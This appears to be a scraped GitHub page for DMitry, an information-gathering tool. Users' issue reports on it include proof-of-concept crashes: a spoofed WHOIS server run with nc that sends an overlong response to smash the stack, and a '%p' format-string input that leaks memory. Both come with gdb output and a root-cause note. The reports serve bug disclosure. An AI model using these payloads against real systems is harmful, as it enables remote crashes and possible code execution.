jaygreig86 / dmitry Goto Github PK
View Code? Open in Web Editor NEWDMitry (Deepmagic Information Gathering Tool)
Home Page: http://www.mor-pah.net
License: GNU General Public License v2.0
DMitry (Deepmagic Information Gathering Tool)
Home Page: http://www.mor-pah.net
License: GNU General Public License v2.0
Did not dig into it, but some domains - like pftech.xyz
provokes segmentation fault
Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.
This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.
PoC:
For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts
:
127.0.0.1 Af.whois-servers.net
Next, I use nc
to act as the WHOIS server:
echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43
While that's running, let's see what happens in DMitry:
$ gdb ./dmitry
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf
Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU
Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141 if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0 0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1 0x4141555555557dfc in ?? ()
#2 0x4141414141414141 in ?? ()
#3 0x41417fffffffe240 in ?? ()
#4 0x4e206e69616d6f44 in ?? ()
#5 0x6f6f66203a656d61 in ?? ()
#6 0x206e69616d6f440a in ?? ()
#7 0x203a737574617453 in ?? ()
#8 0x414141410a726162 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]
Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.
Would it be possible to create a release for 1.3a?
I realize this repository is no longer being actively maintained, but for those who still find the program useful, be aware that there is a serious format string vulnerability, so please carefully validate your inputs!
PoC:
$ ./dmitry "%p %p %p %p %p %p"
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host IP addr. for %p %p %p %p %p %p
Continuing with limited modules
HostIP:
HostName:%p %p %p %p %p %p
Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)
[...]
A maliciously crafted input can achieve arbitrary read/write, potentially leading to arbitrary code execution.
Root Cause:
The function get_nwhois
passes linebuff
, which contains content from the command line, to print_line
:
Lines 3 to 28 in 5ad492c
This eventually reaches printf
as the format string argument:
Lines 3 to 29 in 5ad492c
This is a very unsafe usage of printf
.
I get the following error when I issue the following command. The error generated in the middle of the process.
dmitry -winsepo hackthissite.txt hackthissite.org
Error:
*** buffer overflow detected ***: dmitry terminated
Segmentation fault
I'm trying to read banners from a host in my local network and came across this problem.
System: Linux kali 6.0.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.10-2kali1 (2022-12-06) x86_64 GNU/Linux, VM running on VirtualBox
Error: zsh: segmentation fault dmitry -bp 192.168.15.1
@jaygreig86 Can you make dmitry can run in Windows?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.